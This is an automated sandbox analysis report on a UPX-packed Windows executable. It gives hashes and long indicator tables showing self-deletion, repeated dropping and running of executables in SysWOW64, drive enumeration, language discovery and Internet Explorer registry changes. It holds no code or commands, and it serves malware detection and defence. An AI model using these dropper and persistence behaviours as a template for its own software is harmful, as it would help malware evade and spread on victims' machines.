ae40014fceb0a978dd6d8ac09fac07c498374f371fc6d91f4e28a253db79bf92

Analysis

max time kernel
50s
max time network
146s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 03:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe
Size

71KB
MD5

f50a49a6534625d46a74c5998070604e
SHA1

8c4b863effc28a53954d5505d8e17bb4d447e75b
SHA256

ae40014fceb0a978dd6d8ac09fac07c498374f371fc6d91f4e28a253db79bf92
SHA512

3a66d6ba80f92373dfa8379e6865149d6ebf077c2b6886b64932ac33ab256895fae2869bef64dd4cdba6c0f3820c6727104c4bff65798b3da408a348b7a6df8e
SSDEEP

1536:0FeRfqGyNjJZDbZ26wWqyVmtxxPKckwzewBrCyPjlIo54:qetmJZDbZ2hWqyVw/PKBwbb6oS

Score

7^/10

discovery upx

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
6036	cmd.exe

Executes dropped EXE 64 IoCs

pid	Process
2724	GZbKFaB.exe
1560	yvdnDE4.exe
2272	yvdnDE4.exe
1692	yvdnDE4.exe
1964	yvdnDE4.exe
3032	yvdnDE4.exe
3044	yvdnDE4.exe
572	yvdnDE4.exe
1780	yvdnDE4.exe
2632	yvdnDE4.exe
2816	yvdnDE4.exe
1240	yvdnDE4.exe
524	yvdnDE4.exe
548	yvdnDE4.exe
1712	yvdnDE4.exe
2184	yvdnDE4.exe
2284	yvdnDE4.exe
2044	yvdnDE4.exe
2276	yvdnDE4.exe
868	yvdnDE4.exe
1988	yvdnDE4.exe
1456	yvdnDE4.exe
1816	yvdnDE4.exe
1700	yvdnDE4.exe
1932	yvdnDE4.exe
2352	yvdnDE4.exe
2240	yvdnDE4.exe
1804	yvdnDE4.exe
1588	yvdnDE4.exe
2612	yvdnDE4.exe
840	yvdnDE4.exe
2032	yvdnDE4.exe
2616	yvdnDE4.exe
2928	yvdnDE4.exe
2908	yvdnDE4.exe
1008	yvdnDE4.exe
3036	yvdnDE4.exe
1656	yvdnDE4.exe
344	yvdnDE4.exe
1564	yvdnDE4.exe
2972	yvdnDE4.exe
1600	yvdnDE4.exe
1996	yvdnDE4.exe
860	yvdnDE4.exe
1200	yvdnDE4.exe
2756	yvdnDE4.exe
1724	yvdnDE4.exe
2864	yvdnDE4.exe
2696	yvdnDE4.exe
2520	yvdnDE4.exe
2652	yvdnDE4.exe
856	yvdnDE4.exe
2508	yvdnDE4.exe
2592	yvdnDE4.exe
624	yvdnDE4.exe
2884	yvdnDE4.exe
1304	yvdnDE4.exe
1112	yvdnDE4.exe
1076	yvdnDE4.exe
2428	yvdnDE4.exe
1208	yvdnDE4.exe
2828	yvdnDE4.exe
1392	yvdnDE4.exe
2400	yvdnDE4.exe

Loads dropped DLL 64 IoCs

pid	Process
2724	GZbKFaB.exe
2724	GZbKFaB.exe
1560	yvdnDE4.exe
1560	yvdnDE4.exe
2272	yvdnDE4.exe
2272	yvdnDE4.exe
1692	yvdnDE4.exe
1692	yvdnDE4.exe
1964	yvdnDE4.exe
1964	yvdnDE4.exe
3032	yvdnDE4.exe
3032	yvdnDE4.exe
3044	yvdnDE4.exe
3044	yvdnDE4.exe
572	yvdnDE4.exe
572	yvdnDE4.exe
1780	yvdnDE4.exe
1780	yvdnDE4.exe
2632	yvdnDE4.exe
2632	yvdnDE4.exe
2816	yvdnDE4.exe
2816	yvdnDE4.exe
1240	yvdnDE4.exe
1240	yvdnDE4.exe
524	yvdnDE4.exe
524	yvdnDE4.exe
548	yvdnDE4.exe
548	yvdnDE4.exe
1712	yvdnDE4.exe
1712	yvdnDE4.exe
2184	yvdnDE4.exe
2184	yvdnDE4.exe
2284	yvdnDE4.exe
2284	yvdnDE4.exe
2044	yvdnDE4.exe
2044	yvdnDE4.exe
2276	yvdnDE4.exe
2276	yvdnDE4.exe
868	yvdnDE4.exe
868	yvdnDE4.exe
1988	yvdnDE4.exe
1988	yvdnDE4.exe
1456	yvdnDE4.exe
1456	yvdnDE4.exe
1816	yvdnDE4.exe
1816	yvdnDE4.exe
1700	yvdnDE4.exe
1700	yvdnDE4.exe
1932	yvdnDE4.exe
1932	yvdnDE4.exe
2352	yvdnDE4.exe
2352	yvdnDE4.exe
2240	yvdnDE4.exe
2240	yvdnDE4.exe
1804	yvdnDE4.exe
1804	yvdnDE4.exe
1588	yvdnDE4.exe
1588	yvdnDE4.exe
2612	yvdnDE4.exe
2612	yvdnDE4.exe
840	yvdnDE4.exe
840	yvdnDE4.exe
2032	yvdnDE4.exe
2032	yvdnDE4.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\z:	yvdnDE4.exe
File opened (read-only)	\??\g:	yvdnDE4.exe
File opened (read-only)	\??\g:	yvdnDE4.exe
File opened (read-only)	\??\z:	yvdnDE4.exe
File opened (read-only)	\??\r:	bYmZ0jx.exe
File opened (read-only)	\??\g:	yvdnDE4.exe
File opened (read-only)	\??\u:	yvdnDE4.exe
File opened (read-only)	\??\y:	yvdnDE4.exe
File opened (read-only)	\??\j:	yvdnDE4.exe
File opened (read-only)	\??\v:	yvdnDE4.exe
File opened (read-only)	\??\y:	yvdnDE4.exe
File opened (read-only)	\??\z:	bYmZ0jx.exe
File opened (read-only)	\??\v:	yvdnDE4.exe
File opened (read-only)	\??\r:	yvdnDE4.exe
File opened (read-only)	\??\s:	yvdnDE4.exe
File opened (read-only)	\??\e:	yvdnDE4.exe
File opened (read-only)	\??\o:	yvdnDE4.exe
File opened (read-only)	\??\n:	yvdnDE4.exe
File opened (read-only)	\??\j:	yvdnDE4.exe
File opened (read-only)	\??\x:	bYmZ0jx.exe
File opened (read-only)	\??\i:	bYmZ0jx.exe
File opened (read-only)	\??\z:	yvdnDE4.exe
File opened (read-only)	\??\w:	yvdnDE4.exe
File opened (read-only)	\??\p:	bYmZ0jx.exe
File opened (read-only)	\??\i:	yvdnDE4.exe
File opened (read-only)	\??\p:	yvdnDE4.exe
File opened (read-only)	\??\i:	yvdnDE4.exe
File opened (read-only)	\??\z:	yvdnDE4.exe
File opened (read-only)	\??\n:	yvdnDE4.exe
File opened (read-only)	\??\v:	bYmZ0jx.exe
File opened (read-only)	\??\s:	yvdnDE4.exe
File opened (read-only)	\??\z:	yvdnDE4.exe
File opened (read-only)	\??\h:	yvdnDE4.exe
File opened (read-only)	\??\t:	yvdnDE4.exe
File opened (read-only)	\??\n:	yvdnDE4.exe
File opened (read-only)	\??\q:	yvdnDE4.exe
File opened (read-only)	\??\t:	bYmZ0jx.exe
File opened (read-only)	\??\p:	yvdnDE4.exe
File opened (read-only)	\??\v:	bYmZ0jx.exe
File opened (read-only)	\??\q:	yvdnDE4.exe
File opened (read-only)	\??\e:	bYmZ0jx.exe
File opened (read-only)	\??\k:	yvdnDE4.exe
File opened (read-only)	\??\w:	yvdnDE4.exe
File opened (read-only)	\??\s:	yvdnDE4.exe
File opened (read-only)	\??\w:	yvdnDE4.exe
File opened (read-only)	\??\r:	yvdnDE4.exe
File opened (read-only)	\??\l:	yvdnDE4.exe
File opened (read-only)	\??\w:	bYmZ0jx.exe
File opened (read-only)	\??\q:	yvdnDE4.exe
File opened (read-only)	\??\l:	bYmZ0jx.exe
File opened (read-only)	\??\w:	yvdnDE4.exe
File opened (read-only)	\??\m:	yvdnDE4.exe
File opened (read-only)	\??\j:	yvdnDE4.exe
File opened (read-only)	\??\s:	yvdnDE4.exe
File opened (read-only)	\??\i:	yvdnDE4.exe
File opened (read-only)	\??\j:	yvdnDE4.exe
File opened (read-only)	\??\l:	yvdnDE4.exe
File opened (read-only)	\??\g:	bYmZ0jx.exe
File opened (read-only)	\??\i:	yvdnDE4.exe
File opened (read-only)	\??\k:	bYmZ0jx.exe
File opened (read-only)	\??\h:	yvdnDE4.exe
File opened (read-only)	\??\n:	yvdnDE4.exe
File opened (read-only)	\??\m:	yvdnDE4.exe
File opened (read-only)	\??\r:	yvdnDE4.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	bYmZ0jx.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe
File created	C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe	yvdnDE4.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b000000012251-7.dat	upx
behavioral1/memory/2724-13-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2724-22-0x0000000000270000-0x00000000002AE000-memory.dmp	upx
behavioral1/memory/2272-34-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1692-39-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2724-38-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1560-45-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2272-48-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/3044-55-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1692-54-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1964-64-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1780-61-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/3032-71-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2816-70-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1240-76-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/572-75-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/524-80-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2632-82-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2816-89-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1712-91-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/548-87-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1240-96-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2184-95-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/524-100-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/548-102-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2044-107-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1712-108-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2184-111-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2284-116-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2044-120-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2276-122-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/868-123-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1988-125-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1456-127-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2352-128-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1816-129-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2240-130-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1700-134-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1932-136-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2352-137-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2032-142-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1804-141-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/840-139-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2240-138-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2616-144-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1588-145-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2612-146-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/840-147-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1008-152-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2616-151-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2032-149-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2928-153-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2908-154-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/3036-155-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1656-157-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/344-159-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1564-160-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2972-163-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/860-161-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1600-167-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1996-170-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/2864-174-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/1200-173-0x0000000000400000-0x000000000043E000-memory.dmp	upx
behavioral1/memory/860-171-0x0000000000400000-0x000000000043E000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bYmZ0jx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvdnDE4.exe

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{838B04E1-7AEB-11EF-91A4-527E38F5B48B} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00745b5bf80edb01	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
